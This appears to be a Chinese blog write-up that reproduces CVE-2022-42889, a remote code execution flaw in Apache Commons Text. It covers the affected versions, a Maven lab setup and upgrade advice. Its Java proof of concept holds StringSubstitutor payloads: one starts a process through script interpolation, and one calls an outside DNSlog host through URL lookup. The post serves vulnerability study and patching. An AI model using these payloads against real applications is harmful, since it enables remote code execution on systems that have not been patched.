CVE-2022-42889 Apache Commons Text远程代码执行漏洞复现

0x01 声明:

仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

Apache Commons是Apache软件基金会的项目。Commons的目的是提供可重用的、开源的Java代码。Apache Commons提供了很多工具类库,几乎不依赖其他第三方的类库,接口稳定,集成简单,可以大大提高编码效率和代码质量。

0x03 漏洞概述:

Apache Commons Text 项目实现了一系列关于文本字符串的算法,专注于处理字符串和文本块。10月13日,Apache发布安全公告,修复了Apache Commons Text中的一个远程代码执行漏洞(CVE-2022-42889)。Apache Commons Text版本1.5到1.9中,由于不安全的插值默认值,当输入的参数不受信任时,可能导致远程代码执行。

0x04 影响版本:

1.5 <= Apache Commons Text 版本<= 1.9

0x05 环境搭建:

通过Maven导入jar包。

<dependencies>
        <dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-configuration2</artifactId>
            <version>2.7</version>
        </dependency>
        <dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-text</artifactId>
            <version>1.9</version>
        </dependency>
        <dependency>
            <groupId>org.apache.commons</groupId>
            <artifactId>commons-lang3</artifactId>
            <version>3.12.0</version>
        </dependency>
    </dependencies>

0x06 漏洞复现:

代码:

package org.example;

import org.apache.commons.text.StringSubstitutor;

public class Main {
    public static void main(String[] args) {

        StringSubstitutor interpolator = StringSubstitutor.createInterpolator();
//        String payload = interpolator.replace("${script:js:new java.lang.ProcessBuilder("calc").start()}");
        String payload = interpolator.replace("${url:utf-8:http://owncjx.dnslog.cn}");
        interpolator.replace(payload);
    }
}

命令执行:

DNSlog外带查询:

0x07 修复建议:

目前该漏洞已经修复,受影响用户可以升级到Apache Commons Text 1.10.0。

下载链接:

0x08 参考文档:

https://www.cnblogs.com/wh4am1/p/16795499.html

经验分享 程序员 微信小程序 职场和发展